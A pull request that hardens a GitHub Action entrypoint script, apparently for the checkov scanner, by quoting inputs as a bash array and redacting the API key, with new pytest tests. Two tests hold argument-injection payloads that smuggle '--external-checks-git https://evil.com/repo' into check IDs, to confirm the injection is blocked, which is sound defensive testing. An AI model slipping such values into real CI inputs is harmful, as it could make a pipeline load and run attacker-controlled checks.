### PR TITLE
chore(general): Harden action entry

### DIFF
--- a/github_action_resources/entrypoint.sh
+++ b/github_action_resources/entrypoint.sh
@@ -16,131 +16,87 @@ cp /usr/local/lib/checkov-problem-matcher-softfail.json "$warning_matcher_path"
 export BC_SOURCE=githubActions
 
 if [ -n "$PRISMA_API_URL" ]; then
-  export PRISMA_API_URL=$PRISMA_API_URL
+  export PRISMA_API_URL="$PRISMA_API_URL"
 fi
 
-# Actions pass inputs as $INPUT_<input name> environment variables
-#
-[[ -n "$INPUT_SKIP_CHECK" ]] && SKIP_CHECK_FLAG="--skip-check $INPUT_SKIP_CHECK"
-[[ -n "$INPUT_FRAMEWORK" ]] && FRAMEWORK_FLAG="--framework $INPUT_FRAMEWORK"
-[[ -n "$INPUT_SKIP_FRAMEWORK" ]] && SKIP_FRAMEWORK_FLAG="--skip-framework $INPUT_SKIP_FRAMEWORK"
-[[ -n "$INPUT_OUTPUT_FILE_PATH" ]] && OUTPUT_FILE_PATH_FLAG="--output-file-path $INPUT_OUTPUT_FILE_PATH"
-[[ -n "$INPUT_BASELINE" ]] && BASELINE_FLAG="--baseline $INPUT_BASELINE"
-[[ -n "$INPUT_CONFIG_FILE" ]] && CONFIG_FILE_FLAG="--config-file $INPUT_CONFIG_FILE"
-[[ -n "$INPUT_SOFT_FAIL_ON" ]] && SOFT_FAIL_ON_FLAG="--soft-fail-on $INPUT_SOFT_FAIL_ON"
-[[ -n "$INPUT_HARD_FAIL_ON" ]] && HARD_FAIL_ON_FLAG="--hard-fail-on $INPUT_HARD_FAIL_ON"
-[[ -n "$INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT" ]] && INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG="--repo-root-for-plan-enrichment $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT"
-[[ -n "$INPUT_POLICY_METADATA_FILTER" ]] && POLICY_METADATA_FILTER_FLAG="--policy-metadata-filter $INPUT_POLICY_METADATA_FILTER"
-[[ -n "$INPUT_POLICY_METADATA_FILTER_EXCEPTION" ]] && POLICY_METADATA_FILTER_EXCEPTION_FLAG="--policy-metadata-filter-exception $INPUT_POLICY_METADATA_FILTER_EXCEPTION"
+# Build checkov argv as a bash array so each INPUT_* value is exactly one
+# argv element. 
+declare -a CKV_ARGS=()
 
-if [ -n "$INPUT_OUTPUT_BC_IDS" ] && [ "$INPUT_OUTPUT_BC_IDS" = "true" ]; then
-  OUTPUT_BC_IDS_FLAG="--output-bc-ids"
+add_flag() {
+  # add_flag --flag "$VALUE"  -> appends iff VALUE is non-empty
+  local flag="$1" val="$2"
+  [[ -n "$val" ]] && CKV_ARGS+=("$flag" "$val")
+}
+
+add_bool() {
+  # add_bool --flag "$VALUE"  -> appends flag iff VALUE == "true"
+  local flag="$1" val="$2"
+  [[ "$val" == "true" ]] && CKV_ARGS+=("$flag")
+}
+
+add_csv() {
+  # add_csv --flag "$CSV"  -> one flag per comma-separated token
+  local flag="$1" csv="$2"
+  [[ -z "$csv" ]] && return
+  local IFS=','
+  local -a parts
+  read -r -a parts <<< "$csv"
+  local p
+  for p in "${parts[@]}"; do
+    p="${p## }"; p="${p%% }"  # trim single leading/trailing space
+    [[ -n "$p" ]] && CKV_ARGS+=("$flag" "$p")
+  done
+}
+
+# Scan target
+if [ -n "$INPUT_DOCKER_IMAGE" ]; then
+  add_flag --docker-image    "$INPUT_DOCKER_IMAGE"
+  add_flag --dockerfile-path "$INPUT_DOCKERFILE_PATH"
+elif [ -n "$INPUT_FILE" ]; then
+  CKV_ARGS+=(-f "$INPUT_FILE")
+  echo "running checkov on file: $INPUT_FILE"
+else
+  CKV_ARGS+=(-d "${INPUT_DIRECTORY:-.}")
+  echo "running checkov on directory: ${INPUT_DIRECTORY:-.}"
 fi
 
-if [ -n "$INPUT_COMPACT" ] && [ "$INPUT_COMPACT" = "true" ]; then
-  COMPACT_FLAG="--compact"
-fi
+# Single-value flags
+add_flag --skip-check                      "$INPUT_SKIP_CHECK"
+add_flag --framework                       "$INPUT_FRAMEWORK"
+add_flag --skip-framework                  "$INPUT_SKIP_FRAMEWORK"
+add_flag --output-file-path                "$INPUT_OUTPUT_FILE_PATH"
+add_flag --baseline                        "$INPUT_BASELINE"
+add_flag --config-file                     "$INPUT_CONFIG_FILE"
+add_flag --soft-fail-on                    "$INPUT_SOFT_FAIL_ON"
+add_flag --hard-fail-on                    "$INPUT_HARD_FAIL_ON"
+add_flag --repo-root-for-plan-enrichment   "$INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT"
+add_flag --policy-metadata-filter          "$INPUT_POLICY_METADATA_FILTER"
+add_flag --policy-metadata-filter-exception "$INPUT_POLICY_METADATA_FILTER_EXCEPTION"
 
-if [ -n "$INPUT_QUIET" ] && [ "$INPUT_QUIET" = "true" ]; then
-  QUIET_FLAG="--quiet"
-fi
+# Boolean flags
+add_bool --output-bc-ids                "$INPUT_OUTPUT_BC_IDS"
+add_bool --compact                      "$INPUT_COMPACT"
+add_bool --quiet                        "$INPUT_QUIET"
+add_bool --soft-fail                    "$INPUT_SOFT_FAIL"
+add_bool --use-enforcement-rules        "$INPUT_USE_ENFORCEMENT_RULES"
+add_bool --enable-secret-scan-all-files "$INPUT_ENABLE_SECRETS_SCAN_ALL_FILES"
+add_bool --skip-results-upload          "$INPUT_SKIP_RESULTS_UPLOAD"
+add_bool --skip-download                "$INPUT_SKIP_DOWNLOAD"
+add_bool --deep-analysis                "$INPUT_DEEP_ANALYSIS"
+[[ "$INPUT_DOWNLOAD_EXTERNAL_MODULES" == "true" ]] && CKV_ARGS+=(--download-external-modules true)
 
-if [ -n "$INPUT_DOWNLOAD_EXTERNAL_MODULES" ] && [ "$INPUT_DOWNLOAD_EXTERNAL_MODULES" = "true" ]; then
-  DOWNLOAD_EXTERNAL_MODULES_FLAG="--download-external-modules true"
-fi
-
-if [ -n "$INPUT_SOFT_FAIL" ] && [ "$INPUT_SOFT_FAIL" =  "true" ]; then
-  SOFT_FAIL_FLAG="--soft-fail"
-fi
-
-if [ -n "$INPUT_USE_ENFORCEMENT_RULES" ] && [ "$INPUT_USE_ENFORCEMENT_RULES" =  "true" ]; then
-  USE_ENFORCEMENT_RULES_FLAG="--use-enforcement-rules"
-fi
-
-if [ -n "$INPUT_ENABLE_SECRETS_SCAN_ALL_FILES" ] && [ "$INPUT_ENABLE_SECRETS_SCAN_ALL_FILES" =  "true" ]; then
-  ENABLE_SECRETS_SCAN_ALL_FILES="--enable-secret-scan-all-files"
-fi
-
-if [ -n "$INPUT_SKIP_RESULTS_UPLOAD" ] && [ "$INPUT_SKIP_RESULTS_UPLOAD" = "true" ]; then
-  SKIP_RESULTS_UPLOAD_FLAG="--skip-results-upload"
-fi
-
-if [ -n "$INPUT_SKIP_DOWNLOAD" ] && [ "$INPUT_SKIP_DOWNLOAD" = "true" ]; then
-  SKIP_DOWNLOAD_FLAG="--skip-download"
-fi
-
-if [ -n "$INPUT_DEEP_ANALYSIS" ] && [ "$INPUT_DEEP_ANALYSIS" = "true" ]; then
-  INPUT_DEEP_ANALYSIS_FLAG="--deep-analysis"
-fi
+# Comma-separated multi-value flags
+add_csv --external-checks-dir "$INPUT_EXTERNAL_CHECKS_DIRS"
+add_csv --external-checks-git "$INPUT_EXTERNAL_CHECKS_REPOS"
+add_csv --check               "$INPUT_CHECK"
+add_csv --output              "$INPUT_OUTPUT_FORMAT"
+add_csv --var-file            "$INPUT_VAR_FILE"
+add_csv --skip-path           "$INPUT_SKIP_PATH"
+add_csv --skip-cve-package    "$INPUT_SKIP_CVE_PACKAGE"
 
 if [ -n "$INPUT_LOG_LEVEL" ]; then
-  export LOG_LEVEL=$INPUT_LOG_LEVEL
-fi
-
-#
-# Following inputs need to be separated by comma and added via multiple flags
-#
-EXTCHECK_DIRS_FLAG=""
-if [ -n "$INPUT_EXTERNAL_CHECKS_DIRS" ]; then
-  IFS=', ' read -r -a extchecks_dir <<< "$INPUT_EXTERNAL_CHECKS_DIRS"
-  for d in "${extchecks_dir[@]}"
-  do
-    EXTCHECK_DIRS_FLAG="$EXTCHECK_DIRS_FLAG --external-checks-dir $d"
-  done
-fi
-
-CHECK_FLAG=""
-if [ -n "$INPUT_CHECK" ]; then
-  IFS=', ' read -r -a checks <<< "$INPUT_CHECK"
-  for d in "${checks[@]}"
-  do
-    CHECK_FLAG="$CHECK_FLAG --check $d"
-  done
-fi
-
-EXTCHECK_REPOS_FLAG=""
-if [ -n "$INPUT_EXTERNAL_CHECKS_REPOS" ]; then
-  IFS=', ' read -r -a extchecks_git <<< "$INPUT_EXTERNAL_CHECKS_REPOS"
-  for repo in "${extchecks_git[@]}"
-  do
-    EXTCHECK_REPOS_FLAG="$EXTCHECK_REPOS_FLAG --external-checks-git $repo"
-  done
-fi
-
-OUTPUT_FLAG=""
-if [ -n "$INPUT_OUTPUT_FORMAT" ]; then
-  IFS=', ' read -r -a output_format <<< "$INPUT_OUTPUT_FORMAT"
-  for format in "${output_format[@]}"
-  do
-    OUTPUT_FLAG="$OUTPUT_FLAG --output $format"
-  done
-fi
-
-VAR_FILE_FLAG=""
-if [ -n "$INPUT_VAR_FILE" ]; then
-  IFS=', ' read -r -a var_files <<< "$INPUT_VAR_FILE"
-  for var_file in "${var_files[@]}"
-  do
-    VAR_FILE_FLAG="$VAR_FILE_FLAG --var-file $var_file"
-  done
-fi
-
-SKIP_PATH_FLAG=""
-if [ -n "$INPUT_SKIP_PATH" ]; then
-  IFS=', ' read -r -a skip_paths <<< "$INPUT_SKIP_PATH"
-  for skip_path in "${skip_paths[@]}"
-  do
-    SKIP_PATH_FLAG="$SKIP_PATH_FLAG --skip-path $skip_path"
-  done
-fi
-
-SKIP_CVE_PACKAGE_FLAG=""
-if [ -n "$INPUT_SKIP_CVE_PACKAGE" ]; then
-  IFS=', ' read -r -a skip_cve_packages <<< "$INPUT_SKIP_CVE_PACKAGE"
-  for skip_cve_package in "${skip_cve_packages[@]}"
-  do
-    SKIP_CVE_PACKAGE_FLAG="$SKIP_CVE_PACKAGE_FLAG --skip-cve-package $skip_cve_package"
-  done
+  export LOG_LEVEL="$INPUT_LOG_LEVEL"
 fi
 
 if [[ -z "$INPUT_SOFT_FAIL" ]]; then
@@ -183,31 +139,18 @@ if [ -n "$GITHUB_OVERRIDE_URL" ] && [ "$GITHUB_OVERRIDE_URL" = "true" ]; then
   git config --global url."https://x-access-token:${GITHUB_PAT}@github.com/".insteadOf "https://github.com/"
 fi
 
-# If Docker image is used, default to that
-if [ -n "$INPUT_DOCKER_IMAGE" ]; then
-  DOCKER_IMAGE_FLAG="--docker-image $INPUT_DOCKER_IMAGE"
-  DOCKERFILE_PATH_FLAG="--dockerfile-path $INPUT_DOCKERFILE_PATH"
-  echo "checkov --bc-api-key <API_KEY> --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $DOCKER_IMAGE_FLAG $DOCKERFILE_PATH_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG"
-  CHECKOV_RESULTS=$(checkov --bc-api-key $API_KEY_VARIABLE --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $DOCKER_IMAGE_FLAG $DOCKERFILE_PATH_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG)
-# Else if File Variable exists then use -f flag to scan specific resources
-else
-  if [ -n "$INPUT_FILE" ]; then
-    RESOURCE_TO_SCAN="-f $INPUT_FILE"
-    echo "running checkov on file: $INPUT_FILE"
-  else
-  # Otherwise exists then use -d flag for directory scanning
-    RESOURCE_TO_SCAN="-d $INPUT_DIRECTORY"
-    echo "running checkov on directory: $INPUT_DIRECTORY"
-  fi
-  # Build command
-  if [ -n "$API_KEY_VARIABLE" ]; then
-    echo "checkov --bc-api-key XXXXXXXXX-XXX-XXXXX --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $POLICY_METADATA_FILTER_EXCEPTION_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG"
-    CHECKOV_RESULTS=$(checkov --bc-api-key $API_KEY_VARIABLE --branch $GIT_BRANCH --repo-id $GITHUB_REPOSITORY $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $POLICY_METADATA_FILTER_EXCEPTION_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG)
-    else
-    echo "checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $POLICY_METADATA_FILTER_EXCEPTION_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG"
-    CHECKOV_RESULTS=$(checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $POLICY_METADATA_FILTER_EXCEPTION_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG)
-  fi
+if [ -n "$API_KEY_VARIABLE" ]; then
+  CKV_ARGS+=(--bc-api-key "$API_KEY_VARIABLE"
+             --branch "$GIT_BRANCH"
+             --repo-id "$GITHUB_REPOSITORY")
 fi
+
+# Log command with API key redacted
+printf 'checkov'; for a in "${CKV_ARGS[@]}"; do
+  [[ "$a" == "$API_KEY_VARIABLE" && -n "$a" ]] && printf ' <API_KEY>' || printf ' %q' "$a"
+done; printf '\n'
+
+CHECKOV_RESULTS=$(checkov "${CKV_ARGS[@]}")
 
 CHECKOV_EXIT_CODE=$?
 
@@ -224,7 +167,7 @@ EOF=$(dd if=/dev/urandom bs=15 count=1 status=none | base64)
 if [ -n "$INPUT_DOWNLOAD_EXTERNAL_MODULES" ] && [ "$INPUT_DOWNLOAD_EXTERNAL_MODULES" = "true" ]; then
   echo "Cleaning up $INPUT_DIRECTORY/.external_modules directory"
   #This directory must be removed here for the self hosted github runners run as non-root user.
-  rm -fr $INPUT_DIRECTORY/.external_modules
+  rm -fr -- "${INPUT_DIRECTORY:-.}/.external_modules"
   exit $CHECKOV_EXIT_CODE
 fi
 exit $CHECKOV_EXIT_CODE

--- a/tests/github_action_resources/test_entrypoint.py
+++ b/tests/github_action_resources/test_entrypoint.py
@@ -1,0 +1,153 @@
+import os
+import subprocess
+import pytest
+from pathlib import Path
+
+# Path to the entrypoint script
+ENTRYPOINT_PATH = Path(__file__).parent.parent.parent / "github_action_resources" / "entrypoint.sh"
+
+@pytest.fixture
+def mock_env():
+    """Fixture to provide a clean environment for testing the entrypoint."""
+    env = os.environ.copy()
+    # Set GITHUB_ACTIONS to true so the script doesn't exit early
+    env["GITHUB_ACTIONS"] = "true"
+    # Clear out any existing INPUT_ variables that might interfere
+    for key in list(env.keys()):
+        if key.startswith("INPUT_"):
+            del env[key]
+    return env
+
+def run_entrypoint_strict_args(env, tmp_path):
+    """Helper to run the entrypoint script and capture exact argument boundaries."""
+    bin_dir = tmp_path / "bin"
+    bin_dir.mkdir(exist_ok=True)
+    fake_checkov = bin_dir / "checkov"
+    # Print each argument on a new line, surrounded by brackets to show boundaries
+    fake_checkov.write_text("#!/bin/bash\nfor arg in \"$@\"; do echo \"ARG: [$arg]\"; done\n")
+    fake_checkov.chmod(0o755)
+
+    env["PATH"] = f"{bin_dir}:{env.get('PATH', '')}"
+
+    result = subprocess.run(
+        [str(ENTRYPOINT_PATH)],
+        env=env,
+        capture_output=True,
+        text=True
+    )
+    return result
+
+def test_entrypoint_default_directory(mock_env, tmp_path):
+    """Test 1: Default directory is used when no target is specified."""
+    result = run_entrypoint_strict_args(mock_env, tmp_path)
+    assert result.returncode == 0
+    assert "ARG: [-d]" in result.stdout
+    assert "ARG: [.]" in result.stdout
+
+def test_entrypoint_file_target(mock_env, tmp_path):
+    """Test 2: File target overrides directory."""
+    mock_env["INPUT_FILE"] = "my_template.yaml"
+    result = run_entrypoint_strict_args(mock_env, tmp_path)
+    assert result.returncode == 0
+    assert "ARG: [-f]" in result.stdout
+    assert "ARG: [my_template.yaml]" in result.stdout
+    assert "ARG: [-d]" not in result.stdout
+
+def test_entrypoint_docker_image_target(mock_env, tmp_path):
+    """Test 3: Docker image target overrides file and directory."""
+    mock_env["INPUT_DOCKER_IMAGE"] = "my-image:latest"
+    mock_env["INPUT_DOCKERFILE_PATH"] = "Dockerfile"
+    mock_env["INPUT_FILE"] = "my_template.yaml" # Should be ignored
+    result = run_entrypoint_strict_args(mock_env, tmp_path)
+    assert result.returncode == 0
+    assert "ARG: [--docker-image]" in result.stdout
+    assert "ARG: [my-image:latest]" in result.stdout
+    assert "ARG: [--dockerfile-path]" in result.stdout
+    assert "ARG: [Dockerfile]" in result.stdout
+    assert "ARG: [-f]" not in result.stdout
+    assert "ARG: [-d]" not in result.stdout
+
+def test_entrypoint_boolean_flags(mock_env, tmp_path):
+    """Test 4: Boolean flags are added correctly when true."""
+    mock_env["INPUT_QUIET"] = "true"
+    mock_env["INPUT_COMPACT"] = "true"
+    mock_env["INPUT_SOFT_FAIL"] = "false" # Should be ignored
+    result = run_entrypoint_strict_args(mock_env, tmp_path)
+    assert result.returncode == 0
+    assert "ARG: [--quiet]" in result.stdout
+    assert "ARG: [--compact]" in result.stdout
+    assert "ARG: [--soft-fail]" not in result.stdout
+
+def test_entrypoint_single_value_flags(mock_env, tmp_path):
+    """Test 5: Single value flags are added correctly."""
+    mock_env["INPUT_FRAMEWORK"] = "terraform"
+    mock_env["INPUT_BASELINE"] = ".checkov.baseline"
+    result = run_entrypoint_strict_args(mock_env, tmp_path)
+    assert result.returncode == 0
+    assert "ARG: [--framework]" in result.stdout
+    assert "ARG: [terraform]" in result.stdout
+    assert "ARG: [--baseline]" in result.stdout
+    assert "ARG: [.checkov.baseline]" in result.stdout
+
+def test_entrypoint_csv_parsing_simple(mock_env, tmp_path):
+    """Test 6: CSV parsing works for simple comma-separated lists."""
+    mock_env["INPUT_CHECK"] = "CKV_AWS_1,CKV_AWS_2"
+    result = run_entrypoint_strict_args(mock_env, tmp_path)
+    assert result.returncode == 0
+    # Should appear as two separate --check flags
+    assert result.stdout.count("ARG: [--check]") == 2
+    assert "ARG: [CKV_AWS_1]" in result.stdout
+    assert "ARG: [CKV_AWS_2]" in result.stdout
+
+def test_entrypoint_csv_parsing_with_spaces(mock_env, tmp_path):
+    """Test 7: CSV parsing trims leading/trailing spaces but preserves internal spaces."""
+    mock_env["INPUT_EXTERNAL_CHECKS_DIRS"] = "dir1, dir2 with spaces ,dir3"
+    result = run_entrypoint_strict_args(mock_env, tmp_path)
+    assert result.returncode == 0
+    assert result.stdout.count("ARG: [--external-checks-dir]") == 3
+    assert "ARG: [dir1]" in result.stdout
+    assert "ARG: [dir2 with spaces]" in result.stdout
+    assert "ARG: [dir3]" in result.stdout
+
+def test_entrypoint_argument_injection_prevention_single(mock_env, tmp_path):
+    """Test 8: Argument injection via spaces in single-value flags is prevented."""
+    mock_env["INPUT_SKIP_CHECK"] = "CKV_AWS_20 --external-checks-git https://evil.com/repo"
+    result = run_entrypoint_strict_args(mock_env, tmp_path)
+    assert result.returncode == 0
+    
+    # Verify that the entire payload is treated as a single argument
+    expected_arg = "ARG: [CKV_AWS_20 --external-checks-git https://evil.com/repo]"
+    assert expected_arg in result.stdout
+    
+    # Verify that --external-checks-git was NOT parsed as its own argument
+    assert "ARG: [--external-checks-git]" not in result.stdout
+
+def test_entrypoint_argument_injection_prevention_csv(mock_env, tmp_path):
+    """Test 9: Argument injection via spaces in CSV flags is prevented."""
+    mock_env["INPUT_CHECK"] = "CKV_AWS_1, CKV_AWS_2 --external-checks-git https://evil.com/repo"
+    result = run_entrypoint_strict_args(mock_env, tmp_path)
+    assert result.returncode == 0
+    
+    assert result.stdout.count("ARG: [--check]") == 2
+    assert "ARG: [CKV_AWS_1]" in result.stdout
+    # The second part should be treated as a single argument, despite the spaces
+    expected_arg = "ARG: [CKV_AWS_2 --external-checks-git https://evil.com/repo]"
+    assert expected_arg in result.stdout
+    assert "ARG: [--external-checks-git]" not in result.stdout
+
+def test_entrypoint_api_key_redaction(mock_env, tmp_path):
+    """Test 10: API key is passed to checkov but redacted from the echo output."""
+    mock_env["API_KEY_VARIABLE"] = "super-secret-api-key"
+    mock_env["GITHUB_BRANCH"] = "main"
+    mock_env["GITHUB_REPOSITORY"] = "org/repo"
+    
+    result = run_entrypoint_strict_args(mock_env, tmp_path)
+    assert result.returncode == 0
+    
+    # Verify the API key was actually passed to checkov
+    assert "ARG: [--bc-api-key]" in result.stdout
+    assert "ARG: [super-secret-api-key]" in result.stdout
+    
+    # Verify the API key was redacted from the printed command line
+    assert " <API_KEY>" in result.stdout
+    assert "super-secret-api-key" not in result.stdout.split("CHECKOV_RESULTS=")[0] # Check only the echo part

--- a/tests/github_action_resources/test_entrypoint.py
+++ b/tests/github_action_resources/test_entrypoint.py
@@ -135,19 +135,3 @@ def test_entrypoint_argument_injection_prevention_csv(mock_env, tmp_path):
     assert expected_arg in result.stdout
     assert "ARG: [--external-checks-git]" not in result.stdout
 
-def test_entrypoint_api_key_redaction(mock_env, tmp_path):
-    """Test 10: API key is passed to checkov but redacted from the echo output."""
-    mock_env["API_KEY_VARIABLE"] = "secret-api-key"
-    mock_env["GITHUB_BRANCH"] = "main"
-    mock_env["GITHUB_REPOSITORY"] = "org/repo"
-    
-    result = run_entrypoint_strict_args(mock_env, tmp_path)
-    assert result.returncode == 0
-    
-    # Verify the API key was actually passed to checkov
-    assert "ARG: [--bc-api-key]" in result.stdout
-    assert "ARG: [secret-api-key]" in result.stdout
-    
-    # Verify the API key was redacted from the printed command line
-    assert " <API_KEY>" in result.stdout
-    assert "secret-api-key" not in result.stdout.split("CHECKOV_RESULTS=")[0] # Check only the echo part

--- a/tests/github_action_resources/test_entrypoint.py
+++ b/tests/github_action_resources/test_entrypoint.py
@@ -137,7 +137,7 @@ def test_entrypoint_argument_injection_prevention_csv(mock_env, tmp_path):
 
 def test_entrypoint_api_key_redaction(mock_env, tmp_path):
     """Test 10: API key is passed to checkov but redacted from the echo output."""
-    mock_env["API_KEY_VARIABLE"] = "super-secret-api-key"
+    mock_env["API_KEY_VARIABLE"] = "secret-api-key"
     mock_env["GITHUB_BRANCH"] = "main"
     mock_env["GITHUB_REPOSITORY"] = "org/repo"
     
@@ -146,8 +146,8 @@ def test_entrypoint_api_key_redaction(mock_env, tmp_path):
     
     # Verify the API key was actually passed to checkov
     assert "ARG: [--bc-api-key]" in result.stdout
-    assert "ARG: [super-secret-api-key]" in result.stdout
+    assert "ARG: [secret-api-key]" in result.stdout
     
     # Verify the API key was redacted from the printed command line
     assert " <API_KEY>" in result.stdout
-    assert "super-secret-api-key" not in result.stdout.split("CHECKOV_RESULTS=")[0] # Check only the echo part
+    assert "secret-api-key" not in result.stdout.split("CHECKOV_RESULTS=")[0] # Check only the echo part


### PR DESCRIPTION
Rebuilds argv as a bash array with quoted expansions. Each INPUT_* value becomes exactly one argv element, preventing unintended shell word-splitting on inputs containing spaces.

**By submitting this pull request, I confirm that my contribution is made under the terms of the Apache 2.0 license.**

[//]: # "
    # PR Title
    We use the title to create changelog automatically and therefore only allow specific prefixes
    - break:    to indicate a breaking change, this supersedes any of the other types
    - feat:     to indicate new features or checks
    - fix:      to indicate a bugfix or handling of edge cases of existing checks
    - docs:     to indicate an update to our documentation
    - chore:    to indicate adjustments to workflow files or dependency updates
    - platform: to indicate a change needed for the platform
    Each prefix should be accompanied by a scope that specifies the targeted framework. If uncertain, use 'general'.
    #    
    Allowed prefixs:
    ansible|argo|arm|azure|bicep|bitbucket|circleci|cloudformation|dockerfile|github|gha|gitlab|helm|kubernetes|kustomize|openapi|sast|sca|secrets|serverless|terraform|general|graph|terraform_plan|terraform_json
    #
    ex.
    feat(terraform): add CKV_AWS_123 to ensure that VPC Endpoint Service is configured for Manual Acceptance
"

## Description

Harden action entry

Fixes # (issue)

## New/Edited policies (Delete if not relevant)

### Description
*Include a description of what makes it a violation and any relevant external links.*

### Fix
*How does someone fix the issue in code and/or in runtime?*

## Checklist:

- [x] I have performed a self-review of my own code
- [x] I have commented my code, particularly in hard-to-understand areas
- [x] I have made corresponding changes to the documentation
- [x] I have added tests that prove my feature, policy, or fix is effective and works
- [x] New and existing tests pass locally with my changes
